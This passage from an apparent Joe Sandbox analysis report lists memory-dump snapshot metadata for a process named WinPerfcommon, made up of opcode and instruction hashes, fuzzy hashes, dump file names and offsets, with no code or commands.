                                                                  • Opcode Fuzzy Hash: 7f7fb9a4a67325dbfa05fa05d727d0fe53118c0d5b29e50b133b6552b1474e92
                                                                  • Instruction Fuzzy Hash: F6F1B23091C5A68FEB6CDF18C0D56B577A1FF4A350B5455BDC84E8B68ECA38E881CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62ba8a8564717f3d0bc67334d6e47a204263d8bf626f3957cfc6efba25b14c11
                                                                  • Instruction ID: afae9eea5bbcbc141d4ae7e2b9c057019d01b01f555ed0dd66e39cc5cb440c27
                                                                  • Opcode Fuzzy Hash: 62ba8a8564717f3d0bc67334d6e47a204263d8bf626f3957cfc6efba25b14c11
                                                                  • Instruction Fuzzy Hash: CEF1E33091D5858FEB59DF18C4D06B47BA1FF4A355B9455FDC84ACB28BCA38E881CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 70e045ac8084beef50d81332e9c1b1bdb62a9e829bca65e67de4e19c24fb210e
                                                                  • Instruction ID: ca29236b7be514d4d9d27a7ecb870b13d38ea393d7193e0071d4b89e62bdc9c0
                                                                  • Opcode Fuzzy Hash: 70e045ac8084beef50d81332e9c1b1bdb62a9e829bca65e67de4e19c24fb210e
                                                                  • Instruction Fuzzy Hash: 1DE1053090EB868FE378EF28D494575B7E1FF4A360B1455BEC48AC7682DB29B8429741
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 683de9dc24aa055db91b77e3c891d6c99f5030ca9cd888f2660cd3ed3aef7b92
                                                                  • Instruction ID: 9ee4f41af8afa7564a6ba67f7bb0aa2a41da74e7d9b557b7be63005664c3393f
                                                                  • Opcode Fuzzy Hash: 683de9dc24aa055db91b77e3c891d6c99f5030ca9cd888f2660cd3ed3aef7b92
                                                                  • Instruction Fuzzy Hash: 6ED1E230A0DB868FE379EF28D490575B7E1FF4A360F14257EC48AC7696DA29B842C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 34112d97a0cc9b3f8b0b8511ff60808bdbc9d5b6f156fc843a079690079137ed
                                                                  • Instruction ID: 54f6c6228be5fa316cba42f5a3855160a1f86fa99f37c73b47985ab85b7f25df
                                                                  • Opcode Fuzzy Hash: 34112d97a0cc9b3f8b0b8511ff60808bdbc9d5b6f156fc843a079690079137ed
                                                                  • Instruction Fuzzy Hash: 05C1B03051C5A68FEB1DEF18D0D95B177A1FF4A360B5455BDC84A8B68ECA38E881CB41
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e9fa0a7f8b1b1360be490ae169d7e7c3786385f4853f1a92df82c7bae23995cc
                                                                  • Instruction ID: 623ac9d410592f76a2a4c47d5a556a1fe71269538fd7f2b699d67b07d5649e97
                                                                  • Opcode Fuzzy Hash: e9fa0a7f8b1b1360be490ae169d7e7c3786385f4853f1a92df82c7bae23995cc
                                                                  • Instruction Fuzzy Hash: 80C1D23051DA828FEB5DDF14C0D05B1BBA1FF4A365B9455BDC84B8B58BCA38E891CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f80c72be2b71f7126617b1c6d9d36695ccd5a95da24c9ec0463a2dfb4d457b86
                                                                  • Instruction ID: 883f9d1e815a1299bd7aeb792252a617baaeefcca7c877d7a051ca2dfc52f663
                                                                  • Opcode Fuzzy Hash: f80c72be2b71f7126617b1c6d9d36695ccd5a95da24c9ec0463a2dfb4d457b86
                                                                  • Instruction Fuzzy Hash: 57C1C130A0CA869FE759EF28C0946B5F7A1FF5A360F545179C04EC7A86CB28F851CB90
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43714679a166d9ca293b090124500322598c7ff925fe6e31a8eda34be2ae3711
                                                                  • Instruction ID: 0f51815c97e20df1270360908b6eef6aaa1cec776cc96c056542bdbd195aace3
                                                                  • Opcode Fuzzy Hash: 43714679a166d9ca293b090124500322598c7ff925fe6e31a8eda34be2ae3711
                                                                  • Instruction Fuzzy Hash: 1C21C332D0D1D3DEF2757A6928110F8A750AFCB2F4F1825BAC44FCA1C2DD0C2A8652DA
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85a3874290bc9bd8ce96015bbd0fa94f0e12a2b717d487dc0406edc5f13aa546
                                                                  • Instruction ID: ff5a6870db1cd4ad6a9590c85e5c1ad040c62f3343ec8ba4d80b79be5f0841fe
                                                                  • Opcode Fuzzy Hash: 85a3874290bc9bd8ce96015bbd0fa94f0e12a2b717d487dc0406edc5f13aa546
                                                                  • Instruction Fuzzy Hash: BCA1E83090DA868FE759EF28C0905B4F7A0FF59364F9451BAC04EC7A96DB28F851CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b886310e6bb1bcfebc86e594220620da724df5d4e8895f3ca978804abca5fb7
                                                                  • Instruction ID: 9dbe4fcfe0450d6afce86b06af4d95c256cfa3fb70a8cc3cd020527169aa29ea
                                                                  • Opcode Fuzzy Hash: 5b886310e6bb1bcfebc86e594220620da724df5d4e8895f3ca978804abca5fb7
                                                                  • Instruction Fuzzy Hash: 7711C036D1D5D38EF2367E9924218B8DA509F5B2FCF1825BAD54E860C2DD0CAC812397
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 590a4090bc17ec38fa79c6a956b8f55575bceb606ff928d49df24cfd87b03605
                                                                  • Instruction ID: 9b6f3a7bfb42795fb8fd2f8032f5643e0846ed4fa169ec3d9ccb3d5499ddc45f
                                                                  • Opcode Fuzzy Hash: 590a4090bc17ec38fa79c6a956b8f55575bceb606ff928d49df24cfd87b03605
                                                                  • Instruction Fuzzy Hash: F1115E32D4D5DB8EF275BE28186217CE6C06F5FBF8F1935BAC44E860D2DC4C28856292
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3bd8582300aeb8071f8dc5a0fb0ea778515faaa3495ba73325ef32a2e96c7be3
                                                                  • Instruction ID: 39942d0777f740ed779c3ae154b47d08612723e23c1a08b453a779760d368b33
                                                                  • Opcode Fuzzy Hash: 3bd8582300aeb8071f8dc5a0fb0ea778515faaa3495ba73325ef32a2e96c7be3
                                                                  • Instruction Fuzzy Hash: D411B631C0D5D38EE27A7AA81425879EA505F5B3BCF1C22BAD54E870C2DD0CAC846383
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d242bcc6c322e747b9cd98a76f2879fb1e3dbf080818dcabf01be0b8c3fb70f
                                                                  • Instruction ID: 498c7c1701dcd1fe7fe2d433fbda5f9aaeb89fdc53beed4810cfab22232ff4d9
                                                                  • Opcode Fuzzy Hash: 6d242bcc6c322e747b9cd98a76f2879fb1e3dbf080818dcabf01be0b8c3fb70f
                                                                  • Instruction Fuzzy Hash: BA81287190D682CFE739AE289455176F7E1EF4A3A0F54297ED08BC3282DE39B8418751
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2ce8b0a84e0339169865873b9bc9528bcae4f6552357e50c70832d384eaa859
                                                                  • Instruction ID: 98229880fdcb38239ed534814395742ae07d18b3d22b4babac57de68dad59895
                                                                  • Opcode Fuzzy Hash: c2ce8b0a84e0339169865873b9bc9528bcae4f6552357e50c70832d384eaa859
                                                                  • Instruction Fuzzy Hash: 7B81077190DA868FE339BE289445575F7E0EF4A3A0F14197ED48EC3282DE29B8428752
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b3188a844c258a8556ddf9f1e19d48c27b26b3014b2b7e5ff91fdf8a0e938482
                                                                  • Instruction ID: 9673116ec04fd415b8d1821ccbf2fdb3ee0f9b34c78599b00b0b80e20a6cffa6
                                                                  • Opcode Fuzzy Hash: b3188a844c258a8556ddf9f1e19d48c27b26b3014b2b7e5ff91fdf8a0e938482
                                                                  • Instruction Fuzzy Hash: 8B71153190D6C64FE736EF24D8916A4BBA1EF57360F1901F7C44CCB1E7DA2AA8458392
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 607378dffe35034e8cdcb6c89eefdb285413514b709a2e7bfa0cc4d520723855
                                                                  • Instruction ID: ea3c29a646fc83f6eeeb4fdc22c304ede11a2cb024ca54f71d808e0bd7b15210
                                                                  • Opcode Fuzzy Hash: 607378dffe35034e8cdcb6c89eefdb285413514b709a2e7bfa0cc4d520723855
                                                                  • Instruction Fuzzy Hash: FE81AE31D1D58A9FEBA5EF68C8546BDBBB1FF4A390F1004B9D00ED7282DE286941C751
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8b83512d188353bc2c04e448f32f8a41ebee3bd5a009492fa1cdc53cf35ff1ff
                                                                  • Instruction ID: c0c9288df57f4ea7666e834e7849edd7fcd82527e72715c1e2cb41103900f85d
                                                                  • Opcode Fuzzy Hash: 8b83512d188353bc2c04e448f32f8a41ebee3bd5a009492fa1cdc53cf35ff1ff
                                                                  • Instruction Fuzzy Hash: 4761493590C4C94FE7B8EE18C8565B4B7D0FF8E3F4B0416B9D09EC76A2DD19A8068781
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 95eb13671c4cbb956775940b192a5975b16c996cd7d05ceeecebdc32a7a4cb6d
                                                                  • Instruction ID: 8716c48dbbe8670cf0ecbf76683e36f9dc7ed5970cb298a3c9863c02d4e232e4
                                                                  • Opcode Fuzzy Hash: 95eb13671c4cbb956775940b192a5975b16c996cd7d05ceeecebdc32a7a4cb6d
                                                                  • Instruction Fuzzy Hash: B271A030D1D68A9EEB65EF6488556BCBBB1FF8A390F1400BAD00FD7192EE286841C755
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6ed8a9d03a305ffc3f2810008aef66531b68a3c37ff0f8ba5dd1c6c74f428dda
                                                                  • Instruction ID: c4eeb276e095c00d60a81727d3c74a160cf8cd9c55c44c16a5e25187bf3d44aa
                                                                  • Opcode Fuzzy Hash: 6ed8a9d03a305ffc3f2810008aef66531b68a3c37ff0f8ba5dd1c6c74f428dda
                                                                  • Instruction Fuzzy Hash: E431253160D9184FE768EB1CE88A9B977D0EF5532070502BBE48AC71A7EE11AC8287C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 62f4898e28c8d4d36c0dce1c2836270a46a070297cade9f76d9adf19778e76b0
                                                                  • Instruction ID: 965c697a1bb6735424d9f671eca11d0886d32b17138c8da32aa76a008d43af38
                                                                  • Opcode Fuzzy Hash: 62f4898e28c8d4d36c0dce1c2836270a46a070297cade9f76d9adf19778e76b0
                                                                  • Instruction Fuzzy Hash: 9A418F32A0C959CFDB99EF28D495DB5B3E1FBA9360B0405A9D00EC7182DE24E841CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 037a104486c3de96e15d762b4bc4a47cc2383cbc90eee4d3cfad59ac6c2a44e9
                                                                  • Instruction ID: e5988f0df103decfab5c72bb174c496b95677491df71bcb167a4d85cb7927b37
                                                                  • Opcode Fuzzy Hash: 037a104486c3de96e15d762b4bc4a47cc2383cbc90eee4d3cfad59ac6c2a44e9
                                                                  • Instruction Fuzzy Hash: F6415E31A0C959DFDB99EF28C495DB5B7F1FBA9360B0405AAD00EC3192DE24F885CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3c9ad03135474e0d7d80ca8383bb2014e52b73611092d7f4f70c1d7aedf0220b
                                                                  • Instruction ID: d07c499e98ed27c77b54f824ff403e92587c38ff6cb7dedd74220984d306e039
                                                                  • Opcode Fuzzy Hash: 3c9ad03135474e0d7d80ca8383bb2014e52b73611092d7f4f70c1d7aedf0220b
                                                                  • Instruction Fuzzy Hash: 8B318131A0C959DFDB59EF2CC455E75B3E1FBA9350B0405ADD00EC7592CE28E881CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a51d405015eb9929ad94395438b61d40e6fae38af1ffc1b028eaec7b5ddf530c
                                                                  • Instruction ID: 9f2710550a0dce9cee535ba81b03c5b7e6c53351101bb0d5197afbb80b48af90
                                                                  • Opcode Fuzzy Hash: a51d405015eb9929ad94395438b61d40e6fae38af1ffc1b028eaec7b5ddf530c
                                                                  • Instruction Fuzzy Hash: 2F318F31A0C954DFCB99EF28C0A5E75B7F1FBA9350B0406AAD04EC7192DE24F885CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bbadad84a912c0d274a43d3739386fa6ef227d6daa53fef589953d530931856
                                                                  • Instruction ID: 81d6e944b8c743c451a9ffdfe3bd5c3e032f1aa3199843f9268a92b32ead277b
                                                                  • Opcode Fuzzy Hash: 6bbadad84a912c0d274a43d3739386fa6ef227d6daa53fef589953d530931856
                                                                  • Instruction Fuzzy Hash: 81316131A0C95ADFDB59EF28C455EB5B3E1FBA9350B0405A9D00EC7592DE28E881CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7b5dfe01cf486b7eacc85dfe59c3d93ac67ab38e1d43a7394bcb29264fa53e0a
                                                                  • Instruction ID: 85f86b07b04b63403582bc630ff05239de578c52027a365da809d076eccf6137
                                                                  • Opcode Fuzzy Hash: 7b5dfe01cf486b7eacc85dfe59c3d93ac67ab38e1d43a7394bcb29264fa53e0a
                                                                  • Instruction Fuzzy Hash: 4E31813160C945DFCB99EF28C0A5EB5B7F1FBA9350B1405AAD00EC7192DE24F885CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ecbb3b980d4dfc333010ce07c73a64f083b207de843cbfaa9f13c427066db74e
                                                                  • Instruction ID: 556f6deb0178c07cb7255f56d77fcf80ce58df03e92cff5e6319afd8c8004761
                                                                  • Opcode Fuzzy Hash: ecbb3b980d4dfc333010ce07c73a64f083b207de843cbfaa9f13c427066db74e
                                                                  • Instruction Fuzzy Hash: 8A412330C5C9DA8EF779EA1884247B8B7A1FF5A350F5845BAE04ECB0C6CD287885C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6e03728bc4c5c89bd0aa8a24b7ed235a4309a1f89846b11be78f6a62e0f1c90a
                                                                  • Instruction ID: 01a91349f9e7ef0c17827991eac4797e95f446eefee5a4cd4b6445b5bb678e6e
                                                                  • Opcode Fuzzy Hash: 6e03728bc4c5c89bd0aa8a24b7ed235a4309a1f89846b11be78f6a62e0f1c90a
                                                                  • Instruction Fuzzy Hash: 2F316D21A1E6562EE345B3BC609A2F96790EF447A4F1409BBD00DCB1E7DE1CA881C29C
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f269201ce8d0f96ded0dfc344bdb96178d978bc0fc24b4dd9683e00dd8a832c2
                                                                  • Instruction ID: c54edb4e6fab9839ccf2d1ebf4ff392a3a5842e8c98380d703cd3cc96ec9bb41
                                                                  • Opcode Fuzzy Hash: f269201ce8d0f96ded0dfc344bdb96178d978bc0fc24b4dd9683e00dd8a832c2
                                                                  • Instruction Fuzzy Hash: 3431AF30D0D68D9FDB55EFA8C8509ACBBB1FF5A354F0405AAD04AE7182CA289805CB11
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e5284ffa7583ffbc0a8e3e889019062a8828508928eb2ce3acd97b476aebca
                                                                  • Instruction ID: c841c687244eb3b470dbf4c290ff9862a91a3f969a59e79130fa03f6bce1e304
                                                                  • Opcode Fuzzy Hash: 85e5284ffa7583ffbc0a8e3e889019062a8828508928eb2ce3acd97b476aebca
                                                                  • Instruction Fuzzy Hash: 71317C70E0CA4A9FDB48EF58D4919B8F7A2FF99360B144539C05E93682CF24BC52CB81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 02291729f0d98d725c14bcff6343e3f8fd483ff3d638a4dcbf9e1ba1254cb5f3
                                                                  • Instruction ID: f8ea2b1dfddb09ee8d4a7fa8cbd004b276ec7ab3e1463ee1cf12327e636d9b72
                                                                  • Opcode Fuzzy Hash: 02291729f0d98d725c14bcff6343e3f8fd483ff3d638a4dcbf9e1ba1254cb5f3
                                                                  • Instruction Fuzzy Hash: 4331C772E0CA8A4FE769EB6894512F8F7E1FF49360F14197AC05EC32C2EE1868458641
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3297885721ca182223d3bdaebeb7a4708c532a342f307a231f5b2ef4d759b9d9
                                                                  • Instruction ID: 923e444c12c78798e254a6ddfa927e633617c6b4549c1cb9284e05d8294a7ee7
                                                                  • Opcode Fuzzy Hash: 3297885721ca182223d3bdaebeb7a4708c532a342f307a231f5b2ef4d759b9d9
                                                                  • Instruction Fuzzy Hash: AF310730D1C58ACFEBAAFF5884955BDB7B1FF49390F54107AD40ED6181DA3878409B82
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2504430670.00007FF849350000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849350000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff849350000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f7b513e68afc97b5eaad2918408a40d8ad1d2ba5dea118ed513c1bcd5cb3dbb6
                                                                  • Instruction ID: 315c29088f863eff2097d7dc0e366a78ceba6522d6c3e575b143ad8e2709cb98
                                                                  • Opcode Fuzzy Hash: f7b513e68afc97b5eaad2918408a40d8ad1d2ba5dea118ed513c1bcd5cb3dbb6
                                                                  • Instruction Fuzzy Hash: 3E311A3091D98ACFEBA8EF5484915BDB7B1FF5A390F5010BAD00ED7191DB38AA408B81
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 106b20844f0d8ba1fd8367984fee72a1becd06e6f82ba64198282113859f2a49
                                                                  • Instruction ID: 975b504e12cb4f81e61797aeb7eec4e9151f042945ecdd539472421f146214fc
                                                                  • Opcode Fuzzy Hash: 106b20844f0d8ba1fd8367984fee72a1becd06e6f82ba64198282113859f2a49
                                                                  • Instruction Fuzzy Hash: 1A31C73090D5599FDB45FB24C859ABD7BF0FF6A300F0405BAC00AD71A2DB389880CB50
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 11b3de30c454029966a1b9786025a48e73c1113429606af8c98fad4ae6a46672
                                                                  • Instruction ID: 29d626e5a3463e66d887f4d4bc9a720dd0c46bbd57cdeaaf7e7445295a03e75c
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.2499656581.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_7ff848f40000_WinPerfcommon.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
